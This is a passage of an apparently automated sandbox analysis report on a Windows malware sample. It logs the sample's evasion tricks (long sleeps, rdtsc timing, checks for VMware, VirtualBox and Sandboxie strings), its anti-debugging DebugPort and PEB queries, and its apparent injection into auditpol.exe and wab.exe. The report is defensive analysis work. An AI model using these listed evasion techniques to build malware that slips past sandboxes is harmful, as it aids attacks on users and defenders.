Source: C:\Windows\SysWOW64\auditpol.exe	Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX			Jump to behavior

Malware Analysis System Evasion

Source: Yara match

File source: Process Memory Space: RN# D7521-RN-00353 REV-2.exe PID: 6796, type: MEMORYSTR

Source: C:\Windows\SysWOW64\auditpol.exe	API/Special instruction interceptor: Address: 7FFE2220D324
Source: C:\Windows\SysWOW64\auditpol.exe	API/Special instruction interceptor: Address: 7FFE2220D7E4
Source: C:\Windows\SysWOW64\auditpol.exe	API/Special instruction interceptor: Address: 7FFE2220D944
Source: C:\Windows\SysWOW64\auditpol.exe	API/Special instruction interceptor: Address: 7FFE2220D504
Source: C:\Windows\SysWOW64\auditpol.exe	API/Special instruction interceptor: Address: 7FFE2220D544
Source: C:\Windows\SysWOW64\auditpol.exe	API/Special instruction interceptor: Address: 7FFE2220D1E4
Source: C:\Windows\SysWOW64\auditpol.exe	API/Special instruction interceptor: Address: 7FFE22210154
Source: C:\Windows\SysWOW64\auditpol.exe	API/Special instruction interceptor: Address: 7FFE2220DA44

Source: RN# D7521-RN-00353 REV-2.exe, 00000000.00000002.1846177685.000001C000340000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: RN# D7521-RN-00353 REV-2.exe, 00000000.00000002.1846177685.000001C000340000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SBIEDLL.DLL

Source: C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exe	Memory allocated: 1C076F70000 memory reserve | memory write watch			Jump to behavior
Source: C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exe	Memory allocated: 1C0788E0000 memory reserve | memory write watch			Jump to behavior

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Code function: 1_2_02E9BBA0 rdtsc

1_2_02E9BBA0

Source: C:\Windows\SysWOW64\auditpol.exe	Window / User API: threadDelayed 497			Jump to behavior
Source: C:\Windows\SysWOW64\auditpol.exe	Window / User API: threadDelayed 9476			Jump to behavior

Source: C:\Program Files (x86)\Windows Mail\wab.exe	API coverage: 0.8 %
Source: C:\Windows\SysWOW64\auditpol.exe	API coverage: 3.0 %

Source: C:\Windows\SysWOW64\auditpol.exe TID: 5460	Thread sleep count: 497 > 30			Jump to behavior
Source: C:\Windows\SysWOW64\auditpol.exe TID: 5460	Thread sleep time: -994000s >= -30000s			Jump to behavior
Source: C:\Windows\SysWOW64\auditpol.exe TID: 5460	Thread sleep count: 9476 > 30			Jump to behavior
Source: C:\Windows\SysWOW64\auditpol.exe TID: 5460	Thread sleep time: -18952000s >= -30000s			Jump to behavior
Source: C:\Program Files (x86)\xMTNUwHQkrAETKAtNDqDEHOgjBwWiRwPzmBRVIWIhFMClGyOYqfJAtaCrYmwMXlmIjkSNlfAlbxdtf\uIklAoJgpkP.exe TID: 1368	Thread sleep time: -85000s >= -30000s			Jump to behavior
Source: C:\Program Files (x86)\xMTNUwHQkrAETKAtNDqDEHOgjBwWiRwPzmBRVIWIhFMClGyOYqfJAtaCrYmwMXlmIjkSNlfAlbxdtf\uIklAoJgpkP.exe TID: 1368	Thread sleep count: 43 > 30			Jump to behavior
Source: C:\Program Files (x86)\xMTNUwHQkrAETKAtNDqDEHOgjBwWiRwPzmBRVIWIhFMClGyOYqfJAtaCrYmwMXlmIjkSNlfAlbxdtf\uIklAoJgpkP.exe TID: 1368	Thread sleep time: -43000s >= -30000s			Jump to behavior
Source: C:\Program Files (x86)\xMTNUwHQkrAETKAtNDqDEHOgjBwWiRwPzmBRVIWIhFMClGyOYqfJAtaCrYmwMXlmIjkSNlfAlbxdtf\uIklAoJgpkP.exe TID: 1368	Thread sleep count: 34 > 30			Jump to behavior
Source: C:\Program Files (x86)\xMTNUwHQkrAETKAtNDqDEHOgjBwWiRwPzmBRVIWIhFMClGyOYqfJAtaCrYmwMXlmIjkSNlfAlbxdtf\uIklAoJgpkP.exe TID: 1368	Thread sleep time: -51000s >= -30000s			Jump to behavior

Source: C:\Windows\SysWOW64\auditpol.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\auditpol.exe	Last function: Thread delayed

Source: C:\Windows\SysWOW64\auditpol.exe

Code function: 10_2_029BC2D0 FindFirstFileW,FindNextFileW,FindClose,

10_2_029BC2D0

Source: Amcache.hve.5.dr	Binary or memory string: VMware
Source: Amcache.hve.5.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.5.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.5.dr	Binary or memory string: VMware, Inc.
Source: RN# D7521-RN-00353 REV-2.exe, 00000000.00000002.1846177685.000001C000340000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: Amcache.hve.5.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.5.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.5.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.5.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.5.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: RN# D7521-RN-00353 REV-2.exe, 00000000.00000002.1846177685.000001C000340000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMWARE
Source: RN# D7521-RN-00353 REV-2.exe, 00000000.00000002.1846177685.000001C000340000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\'C:\WINDOWS\system32\drivers\vmmouse.sys&C:\WINDOWS\system32\drivers\vmhgfs.sys
Source: uIklAoJgpkP.exe, 0000000B.00000002.4129044517.000000000054F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll'
Source: Amcache.hve.5.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: RN# D7521-RN-00353 REV-2.exe, 00000000.00000002.1846177685.000001C000340000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
Source: RN# D7521-RN-00353 REV-2.exe, 00000000.00000002.1846177685.000001C000340000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware SVGA II
Source: Amcache.hve.5.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.5.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: auditpol.exe, 0000000A.00000002.4129063317.0000000002FD1000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000000C.00000002.2306887683.000001513C14C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: Amcache.hve.5.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.5.dr	Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: RN# D7521-RN-00353 REV-2.exe, 00000000.00000002.1846177685.000001C000340000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\WINDOWS\system32\drivers\vmmouse.sys
Source: Amcache.hve.5.dr	Binary or memory string: vmci.syshbin`
Source: RN# D7521-RN-00353 REV-2.exe, 00000000.00000002.1846177685.000001C000340000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmware
Source: Amcache.hve.5.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: RN# D7521-RN-00353 REV-2.exe, 00000000.00000002.1846177685.000001C000340000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\WINDOWS\system32\drivers\vmhgfs.sys
Source: RN# D7521-RN-00353 REV-2.exe, 00000000.00000002.1846177685.000001C000340000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
Source: Amcache.hve.5.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.5.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.5.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.5.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.5.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.5.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.5.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.5.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.5.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: RN# D7521-RN-00353 REV-2.exe, 00000000.00000002.1846177685.000001C000340000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: noValueButYesKey)C:\WINDOWS\system32\drivers\VBoxMouse.sys
Source: RN# D7521-RN-00353 REV-2.exe, 00000000.00000002.1846177685.000001C000340000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\WINDOWS\system32\drivers\VBoxMouse.sys
Source: Amcache.hve.5.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.5.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.5.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.5.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Source: C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\auditpol.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Code function: 1_2_02E9BBA0 rdtsc

1_2_02E9BBA0

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Code function: 1_2_00417883 LdrLoadDll,

1_2_00417883

Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E802E1 mov eax, dword ptr fs:[00000030h]		1_2_02E802E1
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E802E1 mov eax, dword ptr fs:[00000030h]		1_2_02E802E1
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E802E1 mov eax, dword ptr fs:[00000030h]		1_2_02E802E1
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F2F2F8 mov eax, dword ptr fs:[00000030h]		1_2_02F2F2F8
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F452E2 mov eax, dword ptr fs:[00000030h]		1_2_02F452E2
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E692FF mov eax, dword ptr fs:[00000030h]		1_2_02E692FF
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F212ED mov eax, dword ptr fs:[00000030h]		1_2_02F212ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F212ED mov eax, dword ptr fs:[00000030h]		1_2_02F212ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F212ED mov eax, dword ptr fs:[00000030h]		1_2_02F212ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F212ED mov eax, dword ptr fs:[00000030h]		1_2_02F212ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F212ED mov eax, dword ptr fs:[00000030h]		1_2_02F212ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F212ED mov eax, dword ptr fs:[00000030h]		1_2_02F212ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F212ED mov eax, dword ptr fs:[00000030h]		1_2_02F212ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F212ED mov eax, dword ptr fs:[00000030h]		1_2_02F212ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F212ED mov eax, dword ptr fs:[00000030h]		1_2_02F212ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F212ED mov eax, dword ptr fs:[00000030h]		1_2_02F212ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F212ED mov eax, dword ptr fs:[00000030h]		1_2_02F212ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F212ED mov eax, dword ptr fs:[00000030h]		1_2_02F212ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F212ED mov eax, dword ptr fs:[00000030h]		1_2_02F212ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F212ED mov eax, dword ptr fs:[00000030h]		1_2_02F212ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E792C5 mov eax, dword ptr fs:[00000030h]		1_2_02E792C5
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E792C5 mov eax, dword ptr fs:[00000030h]		1_2_02E792C5
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E7A2C3 mov eax, dword ptr fs:[00000030h]		1_2_02E7A2C3
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E7A2C3 mov eax, dword ptr fs:[00000030h]		1_2_02E7A2C3
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E7A2C3 mov eax, dword ptr fs:[00000030h]		1_2_02E7A2C3
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E7A2C3 mov eax, dword ptr fs:[00000030h]		1_2_02E7A2C3
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E7A2C3 mov eax, dword ptr fs:[00000030h]		1_2_02E7A2C3
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E9B2C0 mov eax, dword ptr fs:[00000030h]		1_2_02E9B2C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E9B2C0 mov eax, dword ptr fs:[00000030h]		1_2_02E9B2C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E9B2C0 mov eax, dword ptr fs:[00000030h]		1_2_02E9B2C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E9B2C0 mov eax, dword ptr fs:[00000030h]		1_2_02E9B2C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E9B2C0 mov eax, dword ptr fs:[00000030h]		1_2_02E9B2C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E9B2C0 mov eax, dword ptr fs:[00000030h]		1_2_02E9B2C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E9B2C0 mov eax, dword ptr fs:[00000030h]		1_2_02E9B2C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E6B2D3 mov eax, dword ptr fs:[00000030h]		1_2_02E6B2D3
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E6B2D3 mov eax, dword ptr fs:[00000030h]		1_2_02E6B2D3
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E6B2D3 mov eax, dword ptr fs:[00000030h]		1_2_02E6B2D3
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E9F2D0 mov eax, dword ptr fs:[00000030h]		1_2_02E9F2D0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E9F2D0 mov eax, dword ptr fs:[00000030h]		1_2_02E9F2D0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E802A0 mov eax, dword ptr fs:[00000030h]		1_2_02E802A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E802A0 mov eax, dword ptr fs:[00000030h]		1_2_02E802A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E852A0 mov eax, dword ptr fs:[00000030h]		1_2_02E852A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E852A0 mov eax, dword ptr fs:[00000030h]		1_2_02E852A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E852A0 mov eax, dword ptr fs:[00000030h]		1_2_02E852A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E852A0 mov eax, dword ptr fs:[00000030h]		1_2_02E852A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F072A0 mov eax, dword ptr fs:[00000030h]		1_2_02F072A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F072A0 mov eax, dword ptr fs:[00000030h]		1_2_02F072A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F062A0 mov eax, dword ptr fs:[00000030h]		1_2_02F062A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F062A0 mov ecx, dword ptr fs:[00000030h]		1_2_02F062A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F062A0 mov eax, dword ptr fs:[00000030h]		1_2_02F062A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F062A0 mov eax, dword ptr fs:[00000030h]		1_2_02F062A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F062A0 mov eax, dword ptr fs:[00000030h]		1_2_02F062A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F062A0 mov eax, dword ptr fs:[00000030h]		1_2_02F062A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EF92BC mov eax, dword ptr fs:[00000030h]		1_2_02EF92BC
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EF92BC mov eax, dword ptr fs:[00000030h]		1_2_02EF92BC
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EF92BC mov ecx, dword ptr fs:[00000030h]		1_2_02EF92BC
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EF92BC mov ecx, dword ptr fs:[00000030h]		1_2_02EF92BC
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F392A6 mov eax, dword ptr fs:[00000030h]		1_2_02F392A6
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F392A6 mov eax, dword ptr fs:[00000030h]		1_2_02F392A6
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F392A6 mov eax, dword ptr fs:[00000030h]		1_2_02F392A6
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F392A6 mov eax, dword ptr fs:[00000030h]		1_2_02F392A6
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EF0283 mov eax, dword ptr fs:[00000030h]		1_2_02EF0283
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EF0283 mov eax, dword ptr fs:[00000030h]		1_2_02EF0283
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EF0283 mov eax, dword ptr fs:[00000030h]		1_2_02EF0283
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EAE284 mov eax, dword ptr fs:[00000030h]		1_2_02EAE284
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EAE284 mov eax, dword ptr fs:[00000030h]		1_2_02EAE284
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EA329E mov eax, dword ptr fs:[00000030h]		1_2_02EA329E
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EA329E mov eax, dword ptr fs:[00000030h]		1_2_02EA329E
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F45283 mov eax, dword ptr fs:[00000030h]		1_2_02F45283
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F20274 mov eax, dword ptr fs:[00000030h]		1_2_02F20274
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F20274 mov eax, dword ptr fs:[00000030h]		1_2_02F20274
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F20274 mov eax, dword ptr fs:[00000030h]		1_2_02F20274
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F20274 mov eax, dword ptr fs:[00000030h]		1_2_02F20274
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F20274 mov eax, dword ptr fs:[00000030h]		1_2_02F20274
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F20274 mov eax, dword ptr fs:[00000030h]		1_2_02F20274
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F20274 mov eax, dword ptr fs:[00000030h]		1_2_02F20274
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F20274 mov eax, dword ptr fs:[00000030h]		1_2_02F20274
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F20274 mov eax, dword ptr fs:[00000030h]		1_2_02F20274
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F20274 mov eax, dword ptr fs:[00000030h]		1_2_02F20274
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F20274 mov eax, dword ptr fs:[00000030h]		1_2_02F20274
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F20274 mov eax, dword ptr fs:[00000030h]		1_2_02F20274
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E74260 mov eax, dword ptr fs:[00000030h]		1_2_02E74260
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E74260 mov eax, dword ptr fs:[00000030h]		1_2_02E74260
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E74260 mov eax, dword ptr fs:[00000030h]		1_2_02E74260
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E6826B mov eax, dword ptr fs:[00000030h]		1_2_02E6826B
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F3D26B mov eax, dword ptr fs:[00000030h]		1_2_02F3D26B
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F3D26B mov eax, dword ptr fs:[00000030h]		1_2_02F3D26B
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EB1270 mov eax, dword ptr fs:[00000030h]		1_2_02EB1270
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EB1270 mov eax, dword ptr fs:[00000030h]		1_2_02EB1270
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E99274 mov eax, dword ptr fs:[00000030h]		1_2_02E99274
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F2B256 mov eax, dword ptr fs:[00000030h]		1_2_02F2B256
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F2B256 mov eax, dword ptr fs:[00000030h]		1_2_02F2B256
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E69240 mov eax, dword ptr fs:[00000030h]		1_2_02E69240
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E69240 mov eax, dword ptr fs:[00000030h]		1_2_02E69240
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EA724D mov eax, dword ptr fs:[00000030h]		1_2_02EA724D
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E6A250 mov eax, dword ptr fs:[00000030h]		1_2_02E6A250
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E76259 mov eax, dword ptr fs:[00000030h]		1_2_02E76259
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F45227 mov eax, dword ptr fs:[00000030h]		1_2_02F45227
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E6823B mov eax, dword ptr fs:[00000030h]		1_2_02E6823B
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EA7208 mov eax, dword ptr fs:[00000030h]		1_2_02EA7208
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EA7208 mov eax, dword ptr fs:[00000030h]		1_2_02EA7208
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E803E9 mov eax, dword ptr fs:[00000030h]		1_2_02E803E9
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E803E9 mov eax, dword ptr fs:[00000030h]		1_2_02E803E9
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E803E9 mov eax, dword ptr fs:[00000030h]		1_2_02E803E9
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E803E9 mov eax, dword ptr fs:[00000030h]		1_2_02E803E9
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E803E9 mov eax, dword ptr fs:[00000030h]		1_2_02E803E9
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E803E9 mov eax, dword ptr fs:[00000030h]		1_2_02E803E9
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E803E9 mov eax, dword ptr fs:[00000030h]		1_2_02E803E9
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E803E9 mov eax, dword ptr fs:[00000030h]		1_2_02E803E9
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F453FC mov eax, dword ptr fs:[00000030h]		1_2_02F453FC
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F2F3E6 mov eax, dword ptr fs:[00000030h]		1_2_02F2F3E6
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EA63FF mov eax, dword ptr fs:[00000030h]		1_2_02EA63FF
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E8E3F0 mov eax, dword ptr fs:[00000030h]		1_2_02E8E3F0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E8E3F0 mov eax, dword ptr fs:[00000030h]		1_2_02E8E3F0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E8E3F0 mov eax, dword ptr fs:[00000030h]		1_2_02E8E3F0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F2B3D0 mov ecx, dword ptr fs:[00000030h]		1_2_02F2B3D0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E7A3C0 mov eax, dword ptr fs:[00000030h]		1_2_02E7A3C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E7A3C0 mov eax, dword ptr fs:[00000030h]		1_2_02E7A3C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E7A3C0 mov eax, dword ptr fs:[00000030h]		1_2_02E7A3C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E7A3C0 mov eax, dword ptr fs:[00000030h]		1_2_02E7A3C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E7A3C0 mov eax, dword ptr fs:[00000030h]		1_2_02E7A3C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E7A3C0 mov eax, dword ptr fs:[00000030h]		1_2_02E7A3C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E783C0 mov eax, dword ptr fs:[00000030h]		1_2_02E783C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E783C0 mov eax, dword ptr fs:[00000030h]		1_2_02E783C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E783C0 mov eax, dword ptr fs:[00000030h]		1_2_02E783C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E783C0 mov eax, dword ptr fs:[00000030h]		1_2_02E783C0
